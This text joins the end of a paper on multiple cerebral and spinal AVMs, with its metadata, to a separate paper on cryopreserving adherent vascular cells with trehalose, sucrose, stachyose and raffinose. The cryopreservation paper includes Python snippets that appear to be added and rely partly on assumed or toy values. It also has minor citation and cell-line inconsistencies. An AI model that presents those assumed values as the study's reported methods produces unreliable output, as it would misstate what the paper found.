AVMs are congenital lesions occurring between the fourth and eighth weeks of embryonic development, when vessels differentiate into arteries, veins, and capillaries. [5] These lesions are formed by masses of abnormal arteries and veins lacking a true capillary bed in the nidus. [23] The nidus of the AVM comprises large vessels without an elastic layer in their walls. The arteries are deficient in the muscularis layer, and the draining veins are often dilated due to the high velocity of the flowing blood. Various studies have been performed to identify the role of angiogenic factors in the pathogenesis of AVMs. [17,21,24] Tamaki et al. proposed various developmental defects or multiple failures in the persistence of primitive capillary beds as the pathogenesis of multiple AVMs. [19] According to Hasegawa et al., extensive disturbances in early ephrin/ephrin-receptor interactions in the embryo may cause multiple AVMs. [7] Familial AVMs are extremely rare, manifesting at a younger age and occurring more frequently in females. [25] It has been proposed that genetic factors may be involved in the occurrence of familial AVMs. [25] Previously, the ALK1 and ENG genes were shown to be associated with sporadic brain AVMs. [16] Moreover, single nucleotide polymorphisms in interleukin (IL) genes have also been associated with an increased risk of AVM among certain racial or ethnic groups. [10] Nevertheless, multiple AVMs may be the result of a yet-unrevealed pathogenesis or a strong embryogenetic anomaly, which may be different from that involved in single AVMs. An AVM is known to produce harm by its rupture or the rupture of an associated aneurysm, by causing seizures, or by causing ischemia of the adjacent brain matter through the steal phenomenon. [12] Hence, it is essential to screen for and treat AVMs as the symptoms require. Hash et al. suggested that screening for multiple AVMs is warranted when a single lesion does not explain the presenting symptom or sign. [8] Parkinson et al. also advised spinal angiography for the investigation of spontaneous SAH in patients with no demonstrable intracranial source. [15] The angioarchitectural factors that increase the risk of hemorrhage from an AVM include the presence of a flow-related aneurysm, presence of an intranidal aneurysm, deep venous drainage, deep (periventricular) location, small nidus size (<3 cm), high feeding artery pressure, slow arterial filling, and venous stenosis. [6] With the main aim of complete angiographic obliteration of the AVM, treatment modalities such as microsurgery, endovascular embolization, and stereotactic radiosurgery have an established role in the treatment of patients with AVMs, and a staged approach has been proposed for patients with multiple AVMs. [6] We suggest that multimodality treatment tailored to individual cases should be practiced.
CONCLUSION
Multiple AVMs can coexist in the brain and spinal cord, and can be difficult to detect and manage. We suggest that, in cases where one lesion does not explain all the symptoms or where symptoms progressively worsen, there should be a high index of suspicion for another lesion, and further investigations are warranted. For patients with concomitant intracranial and spinal AVMs, multimodality treatment tailored to individual cases currently seems to be the best approach.
"year": 2012,
"sha1": "961e239d6094491892c43f5db044401d69eb2ca2",
"oa_license": "CCBYNCSA",
"oa_url": "https://ecommons.aku.edu/cgi/viewcontent.cgi?article=1141&context=pakistan_fhs_mc_mc",
"oa_status": "GREEN",
"pdf_src": "PubMedCentral",
"pdf_hash": "3b1ae1aee1e7ff4f7e044f59ac92e94c7aa00312",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Cryopreservation of Adherent Smooth Muscle and Endothelial Cells with Disaccharides
Introduction
There is a need for mammalian cell cryopreservation methods that either avoid or improve upon outcomes employing dimethyl sulfoxide (DMSO) as a cryoprotectant. DMSO was the second effective cryoprotectant to be discovered (Lovelock, 1959). Cell cryopreservation usually involves slow-rate freezing with DMSO in culture medium and storage below -135°C for later use. Typically, as long as enough cells survive to start an expanding, proliferating culture, the yield of viable cells after thawing is not an important consideration. However, there are instances where cell yield and viability can be very important. Examples include minimization of expensive delays when starting cultures for bioreactor protein manufacturing runs, and cellular therapies that involve administering cells into patients for the treatment of various diseases, such as cancer. While some cells, for example fibroblasts, are easily cryopreserved, other cell types like keratinocytes, hepatocytes, and cardiac myocytes do not freeze well, and cell yields are often <50%. Furthermore, current opinion is that DMSO should be removed before cells are infused into patients (Caselli et al., 2009; Junior et al., 2008; Mueller et al., 2007; Otrock et al., 2008; Schlegel et al., 2009). The mechanism of DMSO cytotoxicity has not been determined; however, it is thought to modify membrane fluidity, induce cell differentiation, cause cytoplasmic microtubule changes, and form metal complexes (Barnett, 1978; Katsuda et al., 1984, 1987; Miranda et al., 1978). DMSO also decreases the expression of collagen mRNAs in a dose-dependent manner (Zeng et al., 2010).
One strategy for finding interesting new cryoprotectants and cryopreservation strategies is to evaluate what happens in nature. No organisms synthesizing DMSO to survive freezing conditions have been found to date; however, several creatures have been found that employ glycerol, the first effective cryoprotectant to be discovered (Polge, 1949). Nature has developed a wide variety of organisms and animals that tolerate low temperatures and dehydration stress through the accumulation of large amounts of disaccharides, particularly trehalose, including plant seeds, bacteria, insects, yeast, brine shrimp, fungi and their spores, cysts of certain crustaceans, and some soil-dwelling animals. While the cryoprotective capabilities of sucrose and trehalose have been known for years, conventional cryopreservation protocols have generally not employed them, even though early work demonstrated their ability to protect proteins and membrane vesicles during freezing (Rudolph & Crowe, 1985; Crowe et al., 1990). Trehalose has both major advantages and disadvantages for potential preservation of mammalian cells. On the negative side, mammalian cells do not have an active trehalose transport system for uptake of trehalose from the extracellular environment; on the plus side, once inside mammalian cells it is not metabolized, giving it the opportunity to accumulate to potentially effective preservation concentrations. The purposes of the studies presented here were: (1) to assess or review alternative strategies for the delivery of trehalose into mammalian cells; and (2) to determine whether the benefits were specific to trehalose by investigating alternative sugars using the same loading strategies.
Cell culture
Cells used in these studies are described in Table 1.
Cell poration with H5
The pore-forming protein H5 was obtained from the lab of Hagan Bayley (Bayley, 1994). It is derived from the bacterial toxin α-hemolysin, which forms constitutively open pores in cell membranes. The modified bacterial toxin has been engineered to form pores in the membrane that can be opened and closed by the addition of Zn2+. More specific details are presented in the discussion. Cells were plated at 10,000-20,000 cells/well in 96-well microtiter plates the night before. The next day, the cells were washed with DMEM containing 1 mM EDTA for 2 minutes and then again with DMEM to remove the EDTA. 0.2 M trehalose was added and incubated for 20 minutes at 37°C, followed by the appropriate concentration of H5 for the respective cell type. Cells were porated and loaded with trehalose for 1 hour at 37°C before the addition of DMEM with 25 µM ZnSO4 or 10% serum to close the pores. Trehalose in DMEM was then added to the wells, followed by cryopreservation using a controlled-rate freezer (Planar) at approximately -1.0°C/min from 4°C to -80°C with a programmed nucleation step at -5.0°C. Cryopreserved cells were stored overnight at <-135°C. The next day, the cells were placed at -20°C for 30 minutes, followed by rapid thawing at 37°C (Campbell et al., 2003; Taylor et al., 2001). The cell cultures were washed twice and then placed at 37°C for 1 hour to recover under normothermic cell culture conditions before assessment of cell viability.
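The cooling program described above can be expressed as a simple setpoint schedule. The Python sketch below generates one; the function name, 1-minute resolution, and 5-minute nucleation hold are illustrative assumptions rather than settings read from the Planar controller.

```python
def freezing_schedule(start_c=4.0, nucleation_c=-5.0, end_c=-80.0,
                      rate_c_per_min=-1.0, nucleation_hold_min=5):
    """Generate (minute, setpoint in deg C) pairs for a slow-rate freezing run.

    Mirrors the protocol in the text: cool from start_c at rate_c_per_min,
    pause at nucleation_c to seed controlled ice formation, then continue
    to end_c. The 5-minute nucleation hold is an assumed value.
    """
    schedule, t, temp = [], 0, start_c
    # Ramp down to the nucleation temperature at the programmed rate.
    while temp > nucleation_c:
        schedule.append((t, temp))
        temp += rate_c_per_min
        t += 1
    # Hold at the nucleation temperature to trigger ice nucleation.
    for _ in range(nucleation_hold_min):
        schedule.append((t, nucleation_c))
        t += 1
    # Resume the ramp down to the final transfer temperature.
    temp = nucleation_c
    while temp >= end_c:
        schedule.append((t, temp))
        temp += rate_c_per_min
        t += 1
    return schedule

# Example: print the first few setpoints of the run.
for minute, setpoint in freezing_schedule()[:5]:
    print(f"t = {minute:3d} min  setpoint = {setpoint:6.1f} C")
```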
Pretreatment (Incubation) with trehalose
Cells were plated at 10,000-20,000 cells/well and placed in culture. The next day, the culture medium was replaced with EMEM or DMEM containing trehalose (0-0.6 M), and the cells were cultured at 37°C for varying periods of time. After culture, the solution was replaced with fresh medium containing trehalose (0-0.6 M), and the cells were cryopreserved using a controlled-rate freezer as described for H5 above.
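The factorial space implied by this protocol (incubation time crossed with trehalose concentration) is straightforward to enumerate for plate planning. The short Python sketch below does so; the specific grid points are illustrative assumptions, since the text gives only the tested ranges (0-0.6 M, incubation times up to 72 hours).

```python
from itertools import product

# Candidate pretreatment conditions: trehalose concentration crossed with
# incubation time before freezing. These grid points are illustrative,
# not the exact levels tested in the experiments.
concentrations_M = [0.0, 0.1, 0.2, 0.4, 0.6]
incubation_hours = [0, 4, 24, 48, 72]

conditions = list(product(concentrations_M, incubation_hours))
for conc, hours in conditions[:3]:
    print(f"incubate {hours:2d} h in {conc:.1f} M trehalose, then freeze")
print(f"{len(conditions)} conditions x 4 replicate wells each")
```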
Cell poration with ATP
Cells were plated at 10,000-20,000 cells/well and placed in culture. The next day, the cells were washed with poration buffer (phosphate-buffered saline [PBS] with 1X essential amino acids, 1X Vitastock, 5.5 mM glucose) designed to optimize binding of ATP4- to the receptor and facilitate formation of the pore. The cells were then placed in 50 µl of poration buffer, pH 7.45, with 0.2 M trehalose. A stock solution of 100 mM ATP4-, pH 7.45, was made fresh and added to each well to achieve a final concentration of 5 mM. After addition of the ATP4-, the cells were left at 37°C for 1 hour to allow sugar uptake. Following incubation, 200 µl of DMEM plus 1 mM MgCl2 was added to the cells at 37°C to close the pores. After 1 hour of recovery from the loading procedure, cryopreservation was initiated.
Assessment of cell viability
Cell viability was determined using the non-invasive metabolic indicator alamarBlue™ (Trek Diagnostics). A volume of 20 µl was added to cells in 200 µl of DMEM (10% FCS), and the plate was incubated at 37°C for 3 hours. Plates were read using a fluorescent microplate reader (Molecular Dynamics) at an excitation wavelength of 544 nm and an emission wavelength of 590 nm. Viability was measured before and after sugar loading, immediately after thawing, and at several later time points post-thaw.
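Percent viability from the alamarBlue readout is typically computed as blank-corrected sample fluorescence normalized to a matched unfrozen control. A minimal Python sketch of that arithmetic is shown below; the normalization scheme and example numbers are our own illustration, not output from the plate reader software.

```python
def percent_viability(sample_rfu, control_rfu, blank_rfu=0.0):
    """Percent viability from alamarBlue fluorescence (544 nm ex / 590 nm em).

    sample_rfu:  mean fluorescence of cryopreserved/thawed wells
    control_rfu: mean fluorescence of matched untreated (unfrozen) wells
    blank_rfu:   fluorescence of cell-free medium plus alamarBlue
    """
    corrected_sample = sample_rfu - blank_rfu
    corrected_control = control_rfu - blank_rfu
    if corrected_control <= 0:
        raise ValueError("Control signal must exceed the blank.")
    return 100.0 * corrected_sample / corrected_control

# Example: a thawed plate reading 2,950 RFU against a 4,100 RFU control
# and a 450 RFU blank gives roughly 68% viability.
print(f"{percent_viability(2950, 4100, 450):.1f}%")
```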
Statistical methods
All experiments were repeated at least four times with four replicates in each experiment. Statistical differences were assessed by two-way analysis of variance. P-values ≤ 0.05 were regarded as significant.
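For readers who want to reproduce this kind of analysis, a minimal two-way ANOVA in Python using pandas and statsmodels is sketched below; the factor names and the toy viability numbers are illustrative assumptions, not data from these experiments.

```python
import pandas as pd
import statsmodels.api as sm
from statsmodels.formula.api import ols

# Toy dataset standing in for four replicate viability measurements per
# condition; the real experiments used at least four replicates per run.
data = pd.DataFrame({
    "sugar": ["trehalose"] * 4 + ["sucrose"] * 4
             + ["trehalose"] * 4 + ["sucrose"] * 4,
    "conc_M": [0.2] * 8 + [0.4] * 8,
    "viability": [72, 75, 70, 74, 55, 58, 52, 56,
                  68, 71, 66, 70, 50, 49, 53, 51],
})

# Two-way ANOVA with an interaction term, as in the statistical methods.
model = ols("viability ~ C(sugar) * C(conc_M)", data=data).fit()
anova_table = sm.stats.anova_lm(model, typ=2)
print(anova_table)  # effects with p <= 0.05 regarded as significant
```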
H5 poration
One of the first strategies for utilizing disaccharide sugars as cryoprotectants involved the use of a modified pore-forming complex. In our initial studies, we evaluated the H5 mutant α-hemolysin (Bayley, 1994) using two adherent cell lines, A10 and CPAE. The earlier studies had been done with cells in suspension (Eroglu et al., 2000). We also evaluated sucrose, another disaccharide sugar commonly found in nature, for its potential usefulness as a cryoprotectant. Using the protocol of Eroglu et al. as a starting point, a protocol was established for adherent cells. Several parameters were evaluated, including the H5 concentration, time of poration, concentration of trehalose loaded, and time for loading trehalose. Conditions that worked best with adherent cells included 20 minutes for poration followed by 60 minutes for trehalose loading. The highest concentration of trehalose that caused the least drop in cell viability was 0.2 M. The optimum H5 concentration varied according to cell type. The A10 smooth muscle cells were porated with 12.5 µg/mL of H5, while the endothelial CPAE cells were porated with 50 µg/mL. In contrast, the fibroblasts and keratinocytes in the literature were porated with 25 µg/mL (Eroglu et al., 2000). Other changes to the protocol that specifically benefited the viability of adherent cells included the addition of trehalose prior to the addition of H5, the base solution used for poration, and the amount of EDTA (1 mM versus 10 mM) used for the removal of Zn2+ prior to poration. After cryopreservation, however, poor viability was obtained with both cell types. A10 cells demonstrated a viability of 5.57±0.17%; the endothelial cells demonstrated similar viabilities. These values were not as good as those reported in the literature when suspended cells were cryopreserved with sugars. However, it is our experience that adherent cells are generally more difficult to cryopreserve regardless of the cryoprotectant used.
Trehalose exposure without poration
When we started adding trehalose to cells in the H5 experiments, control cells were exposed to trehalose by its addition to the culture medium prior to cryopreservation. An unanticipated observation of cell survival was made with slow-rate cryopreserved CPAE cells, prompting further investigation. The cells exposed to trehalose overnight were observed to develop vacuoles (Fig. 1), suggesting a possible pinocytotic uptake mechanism. After these observations were made, further experiments were designed to examine cell viability after extended trehalose exposure. CPAE cells were exposed to 0.2 M trehalose in Dulbecco's Modified Eagle's Medium (DMEM) buffered with 25 mM HEPES for 0-72 hours at 37°C. After exposure, the cells were left in 0.2 M trehalose and cryopreserved at approximately -1.0°C/min (Fig. 2). CPAE cell viability was observed immediately after thawing. An exposure time of 24 hours provided the best overall cell survival. Extracellular exposure alone during cryopreservation failed to produce any cell survival. In contrast, A10 smooth muscle cells generally did not survive cryopreservation after trehalose exposure as well as the CPAE endothelial cells did. Examination of optimal trehalose concentrations during incubation and during cryopreservation showed that 0.1-0.2 M trehalose during incubation produced the best viability, with a similar concentration being required during the freezing process. Several other parameters were also examined to further improve cell viability. Other studies have shown that not only the concentration and choice of cryoprotectant but also the vehicle solution for the cryoprotectant can have a significant impact on cell viability after cryopreservation (Mathew et al., 2004; Sosef et al., 2005). Initial experiments were performed using DMEM; however, it was observed that CPAE cells, which are grown in EMEM medium, actually preferred exposure to trehalose in EMEM medium. Further experiments examined the buffers used to maintain the pH of the system. Four cell lines were evaluated. CPAE cells demonstrated decreased viability when the zwitterionic buffer 4-(2-hydroxyethyl)-1-piperazineethanesulfonic acid (HEPES) was used, while the other three cell lines did not; rather, a combination of HEPES and sodium bicarbonate was preferred by the CPAE cells. This unusual choice of buffer prompted examination of solution pH during incubation; a pH of 7.4 was optimal for all four cell lines tested. Once loaded with sugar, the cells could either be left in the extracellular sugar at another concentration or placed in an alternative cryoprotectant for preservation.
These studies were then extended to include other sugars: sucrose, raffinose, and stachyose (Fig. 3). The potential cryoprotective benefits of these sugars were evaluated, and it was found that stachyose was as good as trehalose using an identical protocol, sucrose was not quite as good, and raffinose had very little benefit. All cell lines showed evidence of some cell survival days after cryopreservation and thawing. The second smooth muscle cell line, A7R5, demonstrated low levels of viability with stachyose. Both endothelial cell lines, CPAE and BCE, showed good viability after exposure and freezing with sucrose. Overall, the CPAE cell line had the best viability in these experiments. Use of an optimized protocol with trehalose produced excellent post-cryopreservation results with 10-14 mM intracellular trehalose. Conditions included 24 hours of cell culture with 0.2 M trehalose followed by cryopreservation with 0.2-0.4 M trehalose in sodium bicarbonate-buffered EMEM at pH 7.4, resulting in approximately 75% post-preservation cell viability. These experiments confirmed that this technique is more effective for endothelial cells than smooth muscle cells and demonstrated that stachyose is effective for cryopreservation.
ATP poration
In addition to the H5 mutant α-hemolysin poration strategy, we sought other poration techniques that could be used to permeate mammalian cells with disaccharides. Cells expressing the P2X7 purinergic cell surface receptor, also known as the P2Z receptor, may be permeabilized by the formation of a channel/pore that allows passage of molecules into and out of the cell when the active form of ATP (ATP4-) binds to the receptor. Our initial studies focused on determining whether the P2X7 receptor was expressed on smooth muscle and endothelial cells. Experiments using the ELICA assay demonstrated the presence of the P2X7 receptor on both endothelial and smooth muscle cell lines to varying degrees (Fig. 4). The smooth muscle cell lines demonstrated the greatest density of the receptor. ATP-permeabilized cells retained better viability than untreated cells both immediately after thawing and five days later (Fig. 5). Immediate metabolic activity in A7R5 and CPAE cells demonstrated dependence upon increasing ATP concentrations, while for A10 and BCE cells, immediate metabolic activity was increased at all ATP concentrations, with only slight improvement at the higher concentrations tested. However, survival at five days demonstrated that intermediate concentrations of ATP (0.5-2.5 mM) were best. Further cryopreservation studies were performed to optimize cell survival, resulting in at least 25% cell survival for both endothelial cell lines but only low levels of survival for the smooth muscle cells.
Discussion
As cryopreservation has been applied to cells and tissues for clinical use, concerns have developed about toxicity relating to the various cryoprotectants being used, particularly DMSO. Because of this, there has been renewed interest in finding less toxic cryoprotectants. The cryoprotective capabilities of some sugars, disaccharide sugars in particular, have been known for years, and early work demonstrated their ability to protect proteins and membrane vesicles during freezing (Crowe et al., 1990; Rudolph & Crowe, 1985). Coupled with these early studies are observations made in nature regarding organisms that can survive extremes of temperature and desiccation due to their ability to accumulate large amounts of disaccharide sugars, specifically trehalose and sucrose, until more favorable conditions are available. The protective effects of trehalose and sucrose have been determined and may be classified under two general mechanisms: (1) the "water replacement hypothesis," or stabilization of biological membranes and proteins by direct interaction of sugars with polar residues through hydrogen bonding, and (2) stable glass formation (vitrification) by sugars in the dry state (Crowe et al., 1988, 1998, 2001; Slade & Levine, 1991).
Two primary stresses that destabilize membranes have been defined: fusion and lipid phase transition. Studies have shown that when the water that hydrates the phospholipid molecules of the membrane is removed, packing of the head groups increases. The result is an increase in van der Waals interactions and a dramatic increase in the phase transition temperature (Tm) (Crowe et al., 1988, 1990, 1991). At the phase transition, the phospholipid bilayer shifts from a gel phase to a liquid crystalline phase, the state normally observed in fully hydrated cells. For example, the Tm of a cell membrane might be -10°C when fully hydrated, but when water is removed the Tm increases to over 100°C; thus, the membrane is in the gel phase at room temperature. As the membrane shifts between the gel phase and the liquid crystalline phase, it becomes transiently leaky, allowing its intracellular contents to leak out. It would therefore be advantageous to avoid the lipid phase transition, as this can compromise the health of a rehydrated cell. Addition of disaccharide sugars, in particular trehalose, depresses Tm, allowing the membrane to remain in the liquid crystalline state even when dried, so that upon rehydration no phase transition, and hence no transient leaking, takes place. During cryopreservation, water is not necessarily lost, but it undergoes a phase change, forming ice as the temperature drops; depending upon the rate of cooling, the cells become more or less dehydrated, rendering them vulnerable to damage by mechanisms similar to those proposed for desiccated cells. The stabilizing effect of these sugars has been shown in a number of model systems, including liposomes, membranes, viral particles, and proteins. The mechanism by which disaccharide sugars decrease the Tm of a given bilayer has been elucidated: interactions take place between the sugars and the -OH groups of the phosphate in the phospholipid membrane, preventing interaction or fusion of the head groups as the structural water is removed (Crowe et al., 1988, 1989a, 1989b). Although not as well understood, a similar mechanism of action stabilizes proteins during drying (Carpenter et al., 1986, 1987a, 1987b, 1989). Despite their protective qualities, the use of these sugars in mammalian cells has been somewhat limited, mainly because mammalian cell membranes are impermeable to disaccharides or larger sugars, and there is strong evidence that sugars need to be present on both sides of the cell membrane in order to be effective (Crowe et al., 2001; Eroglu et al., 2000; Beattie et al., 1997). This is why, in addition to loading sugars, we added sugars to the cryopreservation solution just before initiating cooling.
In addition to trehalose and sucrose, we were interested in other sugars that could be used as cryoprotectants, avoiding monosaccharides that would likely be degraded in the cell. Larger, more complex sugars, disaccharides or larger, would be less likely to be degraded and utilized inside cells and might therefore be more stable as cryoprotectants.
The comparative structures of the sugars we considered for preservation of mammalian cells are illustrated in Figure 6. Three other sugars were evaluated besides trehalose: sucrose, raffinose, and stachyose. Sucrose and trehalose are both non-reducing sugars, so they do not react with amino acids or proteins and should be relatively stable under low pH conditions and at temperature extremes. Raffinose is a trisaccharide and stachyose is a tetrasaccharide. We have since used these conditions to cryopreserve several adherent cell types (Campbell et al., 2003, 2010). Our rationale for using this adherent model was twofold. First, due to our interest in regenerative medicine, we thought that adherent cells more closely mimicked cells in tissue-engineered devices. Second, we thought there might be a market for cells cryopreserved on plates for research and cytotoxicity testing, CryoPlate™. More recently, another group has been using adherent cells for investigation of preservation by vitrification and drying, and has reported on the cryopreservation of adherent pluripotent stem cells (Katkov et al., 2006, 2011). Katkov et al. presented results for preservation of human embryonic stem cells in 4-well plates and pointed out several advantages of cryopreservation in adherent mode. These included elimination of possible bias due to selective pressure within a pluripotent stem cell line after cryopreservation, and distribution of multiwell plates for immediate use in embryotoxicity and drug screening with pluripotent stem cell-based in vitro toxicology kits (Katkov et al., 2011).
There are several methods in the literature that could be employed for intracellular delivery of these sugars, including those already discussed (Table 2). Many drugs, therapeutic proteins, and small molecules have unfavorable pharmacokinetic properties and do not readily cross cell membranes or other natural physiological barriers within the body. This has resulted in the search for and discovery of alternative methods to transport materials, like sugars, across mammalian cell membranes.
Some of these strategies have been presented in depth in the results sections. The first involved the use of the Staphylococcus aureus toxin α-hemolysin. This toxin is produced as a monomer by the bacteria and then oligomerizes to form pores in mammalian cell membranes. Hagan Bayley and his group modified the wild-type α-hemolysin protein by replacing four native residues with histidines, yielding the mutant termed H5. In addition to forming pores in cell membranes, the H5 mutant can be opened and closed at will. When inserted into the membrane, it is open, and molecules up to 3000 Daltons are able to pass through. The pores are then closed in the presence of Zn2+. To reopen the pore, addition of a chelating agent such as EDTA removes the Zn2+, and the pore is ready to be used again (Bayley, 1994; Walker et al., 1995). Early studies showed that H5 could create pores in mammalian cell membranes and that these could be used for efficient intracellular loading of trehalose (Eroglu et al., 2000; Acker et al., 2003). Our experiments with H5 worked well initially using adherent cells. The results demonstrated good poration and loading of trehalose into cells. However, after adherent cells were cryopreserved, their viability was not very good (<6%). At this point in our studies, several issues arose that prevented further work with H5. First, the H5 pore was derived from the bacterial toxin α-hemolysin, so concerns were raised over whether regulatory approval could be obtained if it were ever to be used clinically with human cells and tissues. There were some indications during these studies that the pores were shed from the membrane over time; however, H5 was still detectable in picogram quantities after 7 days in culture. Finally, as new batches of H5 were delivered, the activity varied greatly, and more H5 was required to achieve the same level of poration compared with earlier batches. Ultimately, the batch variation was attributed to a protein stability issue. When these issues were not resolved, other strategies for introducing trehalose into cells were explored.
An unexpected outcome of our H5 experiments was the development of a new, simple strategy for introducing trehalose into cells, which involved incubating cells in sugar for extended periods of time at physiological temperature. One possible mechanism to explain this observation is that the trehalose substitutes for water molecules in the cell membranes, keeping the membrane stable and preventing it from going through a phase transition (Crowe et al., 1988). A second mechanism is most likely an active uptake process involving endocytosis, similar to that proposed for loading of trehalose by Oliver et al. (2004). Their results suggested that human MSCs are capable of loading trehalose from the extracellular space by a clathrin-dependent, fluid-phase endocytotic mechanism that is microtubule-dependent but actin-independent (Oliver et al., 2004). Further research is required to elucidate the mechanism by which culture in the presence of trehalose facilitates cell cryopreservation, and to determine the degree of cell viability retention under different storage conditions.
The last method presented was poration using the P2Z receptor and ATP. This was a somewhat unique strategy in that it took advantage of the cell's own machinery. It was shown that cells expressing the P2X7 purinergic cell surface receptor, also known as the P2Z receptor, could be permeabilized when the receptor binds ATP4-. The interaction with ATP results in the formation of a non-selective pore that allows molecules up to ~900 Daltons to pass through (Nihei et al., 2000). The P2X7 receptor selectively binds only ATP4-, whose presence in solution is dependent on temperature, pH, and the concentration of divalent cations such as Mg2+. Closure of the pore after activation by ATP is achieved by simply removing ATP from the system or adding exogenous Mg2+, which has a high affinity for the active form of ATP, ATP4-. The P2Z receptor is found on a number of cell types, including cells of hematopoietic origin (Nihei et al., 2000). Several factors likely affected the viability and survival of cells after ATP poration. First is the density of the receptor on the cells, which directly affects the amount of trehalose that can be loaded into the cells and how long loading takes. Another factor is that poration with ATP tends to promote the detachment of adherent cells from their substrate; part of the protocol therefore requires a recovery period of 1 hour at 37°C to allow cells that may have been perturbed by the poration process the chance to settle back onto their substrate. Finally, cell loss is at least in part due to apoptosis; there is evidence in the literature that poration with ATP induces apoptosis in some cell types (Murgia et al., 1992).
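Because Mg2+ sequesters ATP4- as MgATP2-, the pore-closing effect of added MgCl2 can be rationalized with a simple binding calculation. The Python sketch below estimates the free ATP4- fraction from a single dissociation constant; the Kd value is an assumed, order-of-magnitude figure for illustration, and the calculation ignores pH speciation and other cations.

```python
def free_atp4_fraction(mg_free_mM, kd_mgatp_mM=0.1):
    """Fraction of total ATP remaining as free ATP4- in the presence of Mg2+.

    Treats Mg2+ binding as a single equilibrium, ATP4- + Mg2+ <-> MgATP2-,
    with dissociation constant kd_mgatp_mM (assumed value). Assumes Mg2+
    is in excess, so its free concentration approximates its total.
    """
    return 1.0 / (1.0 + mg_free_mM / kd_mgatp_mM)

# Adding 1 mM MgCl2 (as in the pore-closing step) leaves only ~9% of the
# ATP in the active ATP4- form under these assumptions.
print(f"{free_atp4_fraction(1.0):.2%}")
```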
In marked contrast, the human stem cell line TF-1 demonstrated excellent post-cryopreservation survival (Buchanan et al., 2004). We exposed TF-1 cells to ATP with trehalose for 1 hour, followed by a 10-fold dilution of the ATP and inactivation of the active form of ATP (ATP4-) by the addition of 1 mM MgCl2, and then a 1-hour recovery period at 37°C. When the cells were compared to cells cryopreserved with 10% DMSO, the DMSO group demonstrated greater initial viability, close to 100%, that steadily declined over days in culture post-thaw. However, by day 4 of culture post-cryopreservation, the viability of cells cryopreserved in disaccharides was similar to that of cells cryopreserved in DMSO. Similarly, colony-forming assays with TF-1 cells demonstrated outcomes comparable to DMSO. Furthermore, the use of the disaccharides trehalose and sucrose appeared to produce similar results at both slow (1°C/min) and rapid (100°C/min) cooling rates. Buchanan et al. (2010) have extended these studies, obtaining excellent survival of the TF-1 cell line and cord blood-derived multipotential hematopoietic progenitor cells after freeze-drying and storage at room temperature for 4 weeks. It is studies such as Buchanan's that keep us optimistic that disaccharide introduction/preservation strategies can be developed for the preservation of other mammalian cell types. Further development work is required with the cell culture and P2X7 methods, with the promise of preservation by freezing and freeze-drying.
Table 2. Strategies for intracellular delivery of disaccharides.

Method: H5. Description: Derived from α-hemolysin, which normally forms a constitutively open pore in the membrane; engineered to close in the presence of Zn2+ or serum. Limitations: Derived from a bacterial toxin; batch-to-batch variation and instability. References: Bayley, 1994; Eroglu et al., 2000; Acker et al., 2003.

Method: ATP. Description: The naturally occurring P2X7 receptor forms a nonspecific pore upon binding of ATP4-, able to allow molecules <900 Daltons to pass through. Limitations: P2X7 receptor found on some but not all cell types. References: Buchanan et al., 2005.

Method: Culture. Description: Extended incubation of cells in trehalose-containing medium at physiological temperature permits sugar uptake, possibly by fluid-phase endocytosis. Limitations: Uptake mechanism not fully defined; effectiveness varies by cell type. References: Oliver et al., 2004.

There are still other methods in the literature that could lead to intracellular delivery of disaccharides, in addition to those already discussed (Table 2). One method takes advantage of the lipid phase transition described above, which occurs when the cell membrane is exposed to changes in temperature. As the membrane changes from the liquid crystalline phase to the gel phase, it becomes leaky, providing an opportunity to introduce molecules into the cell, such as trehalose, that would not normally cross. Beattie used this method to cryopreserve pancreatic islets by introducing DMSO and trehalose into the islets during the thermotropic phase transition between 5 and 9°C. The islets were then cryopreserved in combination with DMSO, and the viability of the islets after thawing was greater than when DMSO alone was used, 94% versus 58% (Beattie et al., 1997). In a related study, Mondal (2009) cryopreserved kidney cells (MDBK) using 264 mM trehalose. The cells were suspended in trehalose with 20% fetal bovine serum in culture medium, then incubated at 40°C for 1 hour before slow-rate cooling for storage at -80°C. Viability, measured by Trypan Blue exclusion, was 74% upon thawing.
In another variation for loading molecules into cells, a number of proteins have been discovered that possess the ability to cross the cell membrane. These protein transduction domains (PTDs) generally correspond to portions of native proteins. Examples of PTDs include the Tat protein from human immunodeficiency virus type I, the envelope glycoprotein Erns from pestivirus, and the DNA-binding domains of leucine zipper proteins such as c-fos, c-jun, and the yeast transcription factor GCN4 (Futaki et al., 2001, 2004; Langedijk, 2002; Langedijk et al., 2004; Lindgren et al., 2000; Richard et al., 2003; Vives et al., 1997). These PTDs are short cationic peptides that cross the cell membrane in a concentration-dependent manner that is independent of specific receptors or other transporters. The exact mechanism of translocation has not been defined. Enrichment of basic amino acids, particularly arginine and in some instances lysine, has been shown to be important for translocation activity (Futaki et al., 2001, 2004; Vives et al., 1997). Some studies have suggested that endocytosis is involved (Lundberg & Johansson, 2002; Richard et al., 2003); however, the current theory involves interaction with glycosaminoglycans and uptake by a non-endocytotic mechanism that may involve the charged head groups of the phospholipids within the cell membrane (Langedijk, 2002; Langedijk et al., 2004; Mai et al., 2002).
While most of these peptides need to be cross-linked to the molecule of interest, there are peptides that can move proteins and other peptides across the membrane without the requirement for cross-linking. One example is Pep-1, a 21-residue peptide that contains three domains: a tryptophan-rich region (5 residues) for targeting the membrane and forming hydrophobic interactions; a lysine-rich domain to improve intracellular delivery, whose design was taken from nuclear localization sequences of proteins like the simian virus 40 large T antigen; and a proline-containing spacer region that provides flexibility and maintains the other two regions. When mixed with other peptides or proteins, Pep-1 rapidly associates with the protein of interest by noncovalent hydrophobic interactions to form a stable complex. Once in the cytoplasm, the peptide dissociates from the protein it has carried across the membrane, causing little if any interference with the protein's final destination or function. The process occurs by an endocytosis-independent mechanism (Morris et al., 1999, 2001). We anticipate that such peptides may eventually lead to methods for the introduction of disaccharides into mammalian cells.
Another alternative method is electroporation, also called electropermeabilization, which involves the application of an electric pulse that briefly permeabilizes the cell membrane. Since its introduction in the 1980s, it has been primarily used to transfect mammalian cells and bacteria with genetic material. Initially, electroporation tended to kill most cells. However, further development of the electroporation process, such as alternate electrical pulses like the square-wave pulse, has refined the process so that better permeabilization and cell viability can be achieved (Gehl, 2003; Hapala, 1997; Heiser, 2000). The formation of pores, their size, and the recovery of the membrane are important factors that influence the success of an electroporation protocol (Gehl, 2003; Hapala, 1997; Heiser, 2000). Most importantly, electroporation is applicable to all cell types.
